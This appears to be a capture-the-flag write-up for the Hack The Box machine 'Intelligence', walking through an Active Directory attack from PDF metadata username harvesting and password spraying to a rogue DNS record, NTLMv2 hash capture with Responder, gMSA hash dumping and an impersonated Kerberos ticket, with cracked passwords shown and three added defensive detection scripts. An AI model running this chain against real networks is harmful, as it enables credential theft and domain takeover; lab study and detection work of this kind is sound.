Intelligence - Medium

Introduction@Intelligence:~$
Enumeration
Nmap
# Nmap 7.92 scan initiated Thu Sep 23 15:19:45 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.248
Nmap scan report for 10.10.10.248
Host is up (0.35s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-23 16:05:21Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after: 2022-04-19T00:43:16
|_ssl-date: 2021-09-23T16:06:48+00:00; +7h15m01s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h15m00s, deviation: 0s, median: 7h15m00s
| smb2-time:
| date: 2021-09-23T16:06:11
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep 23 15:21:50 2021 -- 1 IP address (1 host up) scanned in 125.17 seconds
Nmap shows a lot of services running on the machine: DNS, LDAP, Kerberos, HTTP, SMB and others, so this is a domain controller. The output also gives us the domain name (intelligence.htb) and the DC hostname (dc.intelligence.htb); add both to the /etc/hosts file. Note the clock skew of about 7h15m that Nmap reports: Kerberos is sensitive to it, and it comes back later.
Web Enumeration

There are two PDFs to download. Their contents are not interesting, but if we look at the metadata of the two files we can see the creator names.

Save them in a file and check whether these two users are valid.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat users
William.Lee
Jose.Williams
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ./kerbrute_linux_amd64 userenum users -d intelligence.htb --dc intelligence.htb
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 11/27/21 - Ronnie Flathers @ropnop
2021/11/27 10:53:09 > Using KDC(s):
2021/11/27 10:53:09 > intelligence.htb:88
2021/11/27 10:53:10 > [+] VALID USERNAME: William.Lee@intelligence.htb
2021/11/27 10:53:10 > [+] VALID USERNAME: Jose.Williams@intelligence.htb
2021/11/27 10:53:10 > Done! Tested 2 usernames (2 valid) in 0.337 seconds
Both accounts are valid. Now query the domain for users with "Do not require Kerberos pre-authentication" set and export their AS-REP hashes for cracking.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py intelligence.htb/ -usersfile users
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
Neither account has "Do not require pre-auth" set. This means we can't AS-REP roast them: that attack needs an account with Kerberos pre-authentication disabled.
Now look at the names of the PDF files; there is a pattern: 2020-01-01-upload.pdf. It's just a date, so we can generate a list of dates and brute-force the other PDF files.
Getting PDF Files
generate_dates.sh
#!/bin/bash
# Print every date from 2020-01-02 to 2022-01-01 inclusive, one per line, in
# zero-padded ISO format (%F) so the names match 2020-01-01-upload.pdf exactly.
start=2020-01-02
end=2022-01-01
while ! [[ "$start" > "$end" ]]; do
    echo "$start"
    start=$(date -d "$start + 1 day" +%F)
done
This script generates every date from 2020-01-02 to 2022-01-01. Now we need to append -upload.pdf to each date and save the result in a file named file_name.txt.
./generate_dates.sh > dates.txt && while read -r line; do echo "${line}-upload.pdf"; done < dates.txt > file_name.txt
file_name.txt output
2020-01-02-upload.pdf
2020-01-03-upload.pdf
2020-01-04-upload.pdf
2020-01-05-upload.pdf
2020-01-06-upload.pdf
2020-01-07-upload.pdf
---[snip]---
The next step is to brute-force with that wordlist using ffuf to find out which PDF files exist.
└──╼ [??]$ ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md
2020-01-23-upload.pdf
2020-01-20-upload.pdf
2020-01-22-upload.pdf
2020-02-17-upload.pdf
2020-02-28-upload.pdf
---[snip]---
I used markdown as the output format because its fields are easy to pick out with awk. You can see the output below.
└──╼ [??]$ cat output
# FFUF Report
Command line : `ffuf -w file_name.txt -mc 200 -u http://intelligence.htb/documents/FUZZ -s -o output -of md`
Time: 2021-11-27T11:57:15+06:30
| FUZZ | URL | Redirectlocation | Position | Status Code | Content Length | Content Words | Content Lines | Content Type | ResultFile |
| :- | :-- | :--------------- | :---- | :------- | :---------- | :------------- | :------------ | :--------- | :----------- |
| 2020-01-23-upload.pdf | http://intelligence.htb/documents/2020-01-23-upload.pdf | | 22 | 200 | 11557 | 167 | 136 | application/pdf | |
| 2020-01-20-upload.pdf | http://intelligence.htb/documents/2020-01-20-upload.pdf | | 19 | 200 | 11632 | 157 | 127 | application/pdf | |
| 2020-01-22-upload.pdf | http://intelligence.htb/documents/2020-01-22-upload.pdf | | 21 | 200 | 28637 | 236 | 224 | application/pdf | |
| 2020-02-17-upload.pdf | http://intelligence.htb/documents/2020-02-17-upload.pdf | | 47 | 200 | 11228 | 167 | 132 | application/pdf | |
| 2020-02-28-upload.pdf | http://intelligence.htb/documents/2020-02-28-upload.pdf | | 58 | 200 | 11543 | 167 | 131 | application/pdf | |
| 2020-01-25-upload.pdf | http://intelligence.htb/documents/2020-01-25-upload.pdf | | 24 | 200 | 26252 | 225 | 193 | application/pdf | |
| 2020-02-11-upload.pdf | http://intelligence.htb/documents/2020-02-11-upload.pdf | | 41 | 200 | 25245 | 241 | 198 | application/pdf | |
We only need the URLs from the fourth field; I used awk to extract them and saved them in a file.
└──╼ [??]$ cat output | awk '{print $4}' > urls.txt
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ cat urls.txt
http://intelligence.htb/documents/2020-01-23-upload.pdf
http://intelligence.htb/documents/2020-01-20-upload.pdf
http://intelligence.htb/documents/2020-01-22-upload.pdf
http://intelligence.htb/documents/2020-02-17-upload.pdf
http://intelligence.htb/documents/2020-02-28-upload.pdf
---[snip]---
Now we can use wget to download every PDF listed in the urls file.
wget -i urls.txt -q

Now we have all the PDFs; let's extract the creator name from each of them.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ exiftool *.pdf | grep 'Creator' | awk '{print $3}' | sort -u
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
---[snip]---
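Both the metadata check on the first two PDFs and the exiftool sweep above rely on the same leak: the authors' domain usernames left in the Creator field of published documents. The Python below is added here as an illustration and is not part of the original write-up; it is the pre-publication check a defender would run over a batch of PDFs before they go on a public web server. It reads Creator and Author strings straight out of the PDF bytes (the sample PDFs are constructed inline; only uncompressed Info dictionaries are handled, not object streams) and reports values shaped like First.Last account names.

```python
import re

# Constructed minimal PDF-like documents (not the files from the write-up).
# The Info dictionary is where exiftool reads /Creator and /Author from.
SAMPLE_PDFS = {
    "2020-01-01-upload.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Creator (William.Lee) "
                              b"/Producer (Microsoft Word) >>\nendobj\n"
                              b"trailer\n<< /Info 1 0 R >>\n%%EOF\n"),
    "2020-12-15-upload.pdf": (b"%PDF-1.4\n1 0 obj\n<< /Author (Jose.Williams) "
                              b"/Creator (Jose.Williams) >>\nendobj\n%%EOF\n"),
    "clean.pdf": b"%PDF-1.4\n1 0 obj\n<< /Producer (LibreOffice 7.0) >>\nendobj\n%%EOF\n",
}

# /Creator (literal string) or /Author (literal string); the capture group
# tolerates backslash escapes inside the string, enough for Office metadata.
_IDENTITY_KEY = re.compile(rb"/(Creator|Author)\s*\(((?:\\.|[^\\)])*)\)")

# sAMAccountName style used in this domain: First.Last
_USERNAME_SHAPE = re.compile(r"^[A-Za-z]+\.[A-Za-z]+$")


def extract_identity_metadata(data: bytes) -> dict:
    """Return {'Creator': ..., 'Author': ...} for literal strings found in
    the PDF bytes. Metadata packed into compressed object streams is not
    decoded, so an empty result only means 'nothing visible in plain text'."""
    found = {}
    for m in _IDENTITY_KEY.finditer(data):
        key = m.group(1).decode("ascii")
        found.setdefault(key, m.group(2).decode("latin-1"))
    return found


def looks_like_username(value: str) -> bool:
    return bool(_USERNAME_SHAPE.match(value))


def audit_pdfs(pdfs: dict) -> dict:
    """Map filename -> sorted usernames leaked through Creator/Author.
    Files with nothing username-shaped are omitted."""
    report = {}
    for name, data in pdfs.items():
        meta = extract_identity_metadata(data)
        leaked = sorted({v for v in meta.values() if looks_like_username(v)})
        if leaked:
            report[name] = leaked
    return report


if __name__ == "__main__":
    for name, users in audit_pdfs(SAMPLE_PDFS).items():
        print(f"{name}: strip metadata before publishing, leaks {', '.join(users)}")
```

Anything this reports should have its metadata stripped (or the Creator set to a generic value) before publication; the check is deliberately conservative and will miss metadata stored in compressed object streams, so pair it with exiftool on real documents.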
Save all usernames in a file and check again which users are valid.
./kerbrute_linux_amd64 userenum users.txt -d intelligence.htb --dc intelligence.htb

All 30 accounts are valid. I checked which accounts have "Do not require Kerberos pre-authentication" set, but unfortunately not a single one does.
Enumerating the PDFs
When I grep the PDFs for "pass", I see this.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ pdfgrep "pass" *.pdf
2020-06-04-upload.pdf:Please login using your username and the default password of:
2020-06-04-upload.pdf:After logging in please change your password as soon as possible.

In another PDF I also found this:

It tells us about a script placed by the user Ted, and that they are in the process of locking down service accounts. Now we have a password and multiple users, so we should try a password spraying attack against all users with the password we found.
crackmapexec smb intelligence.htb -u users.txt -p 'NewIntelligenceCorpUser9876' --shares

One user is valid with that password, and we can also access that user's share.
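The spray above tries one password against every username in the list. On the domain controller that shows up as a burst of failed logons (Event ID 4625, or 4771 for Kerberos) from one source across many different accounts, which is the signature a defender can alert on. The Python below is an added example, not from the original post: it runs a sliding-window check over constructed sample events (timestamp, event ID, target user, source IP; the usernames are the ones harvested above and the source IP is the attacker's from this write-up) and flags a source once it has failed against five distinct accounts within five minutes, then records any later success from that source as the spray's hit.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample events, reduced to the fields a spray detection needs.
# Shape: (timestamp, event_id, target_user, source_ip). 4625 = failed logon,
# 4624 = successful logon, as a domain controller would record them.
SAMPLE_EVENTS = [
    ("2021-11-27T12:00:01", 4625, "Anita.Roberts", "10.10.14.35"),
    ("2021-11-27T12:00:02", 4625, "Brian.Baker", "10.10.14.35"),
    ("2021-11-27T12:00:02", 4625, "Brian.Morris", "10.10.14.35"),
    ("2021-11-27T12:00:03", 4625, "Daniel.Shelton", "10.10.14.35"),
    ("2021-11-27T12:00:03", 4625, "Danny.Matthews", "10.10.14.35"),
    ("2021-11-27T12:00:04", 4625, "Darryl.Harris", "10.10.14.35"),
    ("2021-11-27T12:00:04", 4625, "David.Mcbride", "10.10.14.35"),
    ("2021-11-27T12:00:05", 4624, "Tiffany.Molina", "10.10.14.35"),
    # One user mistyping a password a few times: many failures, one account.
    ("2021-11-27T12:01:00", 4625, "Brian.Baker", "10.10.10.50"),
    ("2021-11-27T12:03:00", 4625, "Brian.Baker", "10.10.10.50"),
    ("2021-11-27T12:07:00", 4625, "Brian.Baker", "10.10.10.50"),
]

WINDOW = timedelta(minutes=5)
DISTINCT_USERS_THRESHOLD = 5


def detect_password_spray(events, window=WINDOW, threshold=DISTINCT_USERS_THRESHOLD):
    """Flag every source IP whose failed logons cover at least `threshold`
    distinct accounts inside a sliding `window`. Repeated failures for one
    account never trip this, while one password tried across many accounts
    does. Successful logons from an already-flagged source are recorded as
    the spray's hits."""
    ordered = sorted(events, key=lambda e: e[0])
    failures = defaultdict(deque)   # source_ip -> deque of (ts, user)
    alerts = {}                     # source_ip -> alert dict
    for ts_str, event_id, user, src in ordered:
        ts = datetime.fromisoformat(ts_str)
        if event_id == 4625:
            window_q = failures[src]
            window_q.append((ts, user))
            while ts - window_q[0][0] > window:   # drop failures older than the window
                window_q.popleft()
            distinct = {u for _, u in window_q}
            if src in alerts:
                alerts[src]["accounts_tried"] = sorted(
                    set(alerts[src]["accounts_tried"]) | distinct)
            elif len(distinct) >= threshold:
                alerts[src] = {
                    "source": src,
                    "first_seen": window_q[0][0].isoformat(),
                    "accounts_tried": sorted(distinct),
                    "successes": [],
                }
        elif event_id == 4624 and src in alerts:
            alerts[src]["successes"].append(user)
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_password_spray(SAMPLE_EVENTS):
        print(f"spray from {alert['source']} starting {alert['first_seen']}: "
              f"{len(alert['accounts_tried'])} accounts tried, hits: {alert['successes']}")
```

The threshold and window are tuning knobs: a real spray against 30 accounts, as above, is far above five, while a help-desk user retyping a password stays at one distinct account however many times they fail. A success following the burst is the event worth paging on.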
smbclient \\\\intelligence.htb\\Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Mon Apr 19 07:50:26 2021
.. DR 0 Mon Apr 19 07:50:26 2021
Administrator D 0 Mon Apr 19 06:48:39 2021
All Users DHSrn 0 Sat Sep 15 13:51:46 2018
Default DHR 0 Mon Apr 19 08:47:40 2021
Default User DHSrn 0 Sat Sep 15 13:51:46 2018
desktop.ini AHS 174 Sat Sep 15 13:41:27 2018
Public DR 0 Mon Apr 19 06:48:39 2021
Ted.Graves D 0 Mon Apr 19 07:50:26 2021
Tiffany.Molina D 0 Mon Apr 19 07:21:46 2021
3770367 blocks of size 4096. 1390125 blocks available
smb: \>
In Tiffany’s directory we can find the user flag.
smb: \Tiffany.Molina\Desktop\> more user.txt
cc107e8830f*********f6f1e4795d69a6b
Privilege Escalation
In the IT share:
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/pdf]
└──╼ [??]$ smbclient \\\\intelligence.htb\\IT -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Apr 19 07:20:55 2021
.. D 0 Mon Apr 19 07:20:55 2021
downdetector.ps1 A 1046 Mon Apr 19 07:20:55 2021
3770367 blocks of size 4096. 1390093 blocks available
smb: \> get downdetector.ps1
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \>
We get a PowerShell script:
# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}
It looks like a scheduled job that runs every 5 minutes. It enumerates the DNS records of the AD-integrated zone, and for every record whose name starts with web it makes an HTTP request to that name using the current user's credentials (probably Ted's, since the mail is sent from his address). If the response code is not 200 (OK), it emails Ted to say that the host is down.
If we add a DNS record that points at our own IP, the script's HTTP request will reach us, and we can demand NTLM authentication in reply. So if we can add a record to the zone, we can capture Ted.Graves's NTLMv2 hash with Responder.
To add a DNS record we will use dnstool.py from krbrelayx:
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -a add -r 'weboops.intelligence.htb' -d 10.10.14.35 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/home/sheinn101/htb/intelligence/writeup/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead
res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully
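The record was added over LDAP, which works for an ordinary domain user because AD-integrated zones grant Authenticated Users the right to create child objects by default. With Directory Service Changes auditing enabled and a SACL on the zone container, each such creation is logged as Event ID 5137 (a directory service object was created) carrying the creating account and the new dnsNode's DN. The Python below is an added example, not part of the write-up or of krbrelayx: it triages constructed 5137 records, keeps only dnsNode creations, drops ones by an allowlisted writer (a hypothetical allowlist holding only the DC's computer account) and marks records whose name matches the web* prefix that downdetector.ps1 polls.

```python
import re

# Constructed Event ID 5137 records, reduced to the three fields this check
# needs. The DN layout is the one downdetector.ps1 enumerates:
#   DC=<record>,DC=<zone>,CN=MicrosoftDNS,DC=DomainDnsZones,...
SAMPLE_5137 = [
    {"subject": "INTELLIGENCE\\DC$", "object_class": "dnsNode",
     "object_dn": "DC=dc,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb"},
    {"subject": "INTELLIGENCE\\Tiffany.Molina", "object_class": "dnsNode",
     "object_dn": "DC=weboops,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb"},
    {"subject": "INTELLIGENCE\\Tiffany.Molina", "object_class": "user",
     "object_dn": "CN=Test User,CN=Users,DC=intelligence,DC=htb"},
]

# Hypothetical allowlist: principals expected to write DNS records in this
# domain. Anything else creating a dnsNode deserves a look.
TRUSTED_DNS_WRITERS = {"INTELLIGENCE\\DC$"}

_DNS_NODE_DN = re.compile(r"^DC=([^,]+),DC=([^,]+),CN=MicrosoftDNS,", re.IGNORECASE)


def parse_dns_node_dn(dn):
    """Return (record_name, zone) for a dnsNode DN inside an AD-integrated
    zone, or None if the DN is not a DNS record at all."""
    m = _DNS_NODE_DN.match(dn)
    return (m.group(1), m.group(2)) if m else None


def suspicious_dns_record_creations(events, trusted=TRUSTED_DNS_WRITERS,
                                    watched_prefixes=("web",)):
    """Flag dnsNode creations by principals outside `trusted`. Records whose
    name starts with a watched prefix (the web* names the scheduled script
    requests with its credentials) are marked so they can be prioritised."""
    alerts = []
    for ev in events:
        if ev["object_class"].lower() != "dnsnode":
            continue
        parsed = parse_dns_node_dn(ev["object_dn"])
        if parsed is None or ev["subject"] in trusted:
            continue
        name, zone = parsed
        alerts.append({
            "subject": ev["subject"],
            "record": f"{name}.{zone}",
            "watched": name.lower().startswith(watched_prefixes),
        })
    return alerts


if __name__ == "__main__":
    for a in suspicious_dns_record_creations(SAMPLE_5137):
        flag = " (matches a name the downdetector script will request)" if a["watched"] else ""
        print(f"{a['subject']} created DNS record {a['record']}{flag}")
```

The structural fix is to stop scripts that run as a privileged account from sending default credentials to whatever name a DNS lookup returns; the detection above buys time until that is done.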
Now our record is in the zone. Run Responder and wait about 5 minutes; Ted.Graves's NTLMv2 hash shows up in Responder.
sudo responder -I tun0 -A

[+] Listening for events...
[HTTP] NTLMv2 Client : 10.10.10.248
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:9b02c16f450e2d---[snip]---
Now we have the hash; crack it with john.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup/krbrelayx]
└──╼ [??]$ john hash --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:09 DONE (2021-11-27 18:29) 0.1075g/s 1162Kp/s 1162Kc/s 1162KC/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
We have Ted's password. Now we can try gMSADumper to read the password of the svc_int service account.
└──╼ [??]$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb' -l 'dc.intelligence.htb'
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::b98d4cef68f72a98dfeed732d1b1abca
Now we have the NT hash. I tried to crack it to get the password, but unfortunately got nothing; that is expected, since gMSA passwords are long random values that Windows rotates automatically.
Getting Silver Ticket
Let's use the pass-the-hash technique with the svc_int$ hash to impersonate the administrator and get the silver ticket. To generate it we need one more thing: an SPN (Service Principal Name).
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.
We will use the BloodHound collector to dump the AD environment and find the SPN.
┌─[sheinn101@parrot]─[/opt/BloodHound.py]
└──╼ [??]$ python3 bloodhound.py -u Ted.Graves -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c All
INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The DNS query name does not exist: svc_int.intelligence.htb.
INFO: Done in 01M 24S
It dumps all the information in JSON format. We are looking for the SPN, which should be in the computers.json file.
└──╼ [??]$ cat 20211127184623_computers.json | json
{
"computers": [
{
"ObjectIdentifier": "S-1-5-21-4210132550-3389855604-3437519686-1144",
"AllowedToAct": [],
"PrimaryGroupSid": "S-1-5-21-4210132550-3389855604-3437519686-515",
"LocalAdmins": [],
"PSRemoteUsers": [],
"Properties": {
"name": "SVC_INT.INTELLIGENCE.HTB",
"objectid": "S-1-5-21-4210132550-3389855604-3437519686-1144",
"domain": "INTELLIGENCE.HTB",
"highvalue": false,
"distinguishedname": "CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb",
"unconstraineddelegation": false,
"enabled": true,
"haslaps": false,
"lastlogontimestamp": -1,
"pwdlastset": 1638043891,
"serviceprincipalnames": [],
"description": null,
"operatingsystem": null,
"allowedtodelegate": [
"WWW/dc.intelligence.htb"
]
},
As you can see on the last lines, svc_int is allowed to delegate to WWW/dc.intelligence.htb (constrained delegation). Now we are able to get the silver ticket.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
We get an error because Kerberos tickets are time-constrained and our clock is hours off from the server's (the +7h15m skew Nmap reported, far beyond the 5 minutes Kerberos tolerates by default). We need to match our time with the server's time.
sudo ntpdate 10.10.10.248
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/getST.py -hashes :b98d4cef68f72a98dfeed732d1b1abca -spn WWW/dc.intelligence.htb -impersonate administrator intelligence.htb/svc_int$
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
We got the silver ticket and it is saved in the current directory.
export KRB5CCNAME=`pwd`/administrator.ccache
Export the saved ticket, so that Kerberos clients can use it.
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/smbclient.py intelligence.htb/administrator@dc.intelligence.htb -no-pass -k
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Type help for list of commands
# who
host: \\10.10.14.35, user: administrator, active: 3, idle: 0
# shares
ADMIN$
C$
IPC$
IT
NETLOGON
SYSVOL
Users
# use Users
# ls
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 .
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 ..
drw-rw-rw- 0 Mon Apr 19 06:48:39 2021 Administrator
drw-rw-rw- 0 Mon Apr 19 09:46:30 2021 All Users
drw-rw-rw- 0 Mon Apr 19 08:47:40 2021 Default
drw-rw-rw- 0 Mon Apr 19 09:46:30 2021 Default User
-rw-rw-rw- 174 Mon Apr 19 09:45:17 2021 desktop.ini
drw-rw-rw- 0 Mon Apr 19 06:48:39 2021 Public
drw-rw-rw- 0 Mon Apr 19 07:50:26 2021 Ted.Graves
drw-rw-rw- 0 Mon Apr 19 07:21:46 2021 Tiffany.Molina
# cd Administrator
# cd Desktop
# ls
drw-rw-rw- 0 Mon Apr 19 07:21:57 2021 .
drw-rw-rw- 0 Mon Apr 19 07:21:57 2021 ..
-rw-rw-rw- 282 Mon Apr 19 07:10:10 2021 desktop.ini
-rw-rw-rw- 34 Sat Nov 27 13:07:38 2021 root.txt
# get root.txt
# exit
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ ls
2020-01-01-upload.pdf 2020-12-15-upload.pdf administrator.ccache kerbrute_linux_amd64 krbrelayx pdf root.txt users
┌─[sheinn101@parrot]─[~/htb/intelligence/writeup]
└──╼ [??]$ cat root.txt
bf3bbe85e74********02d3aea9ed5b57
Now we pwned it.

Resources
https://github.com/dirkjanm/krbrelayx
https://adsecurity.org/?p=2011
https://github.com/micahvandeusen/gMSADumper
https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64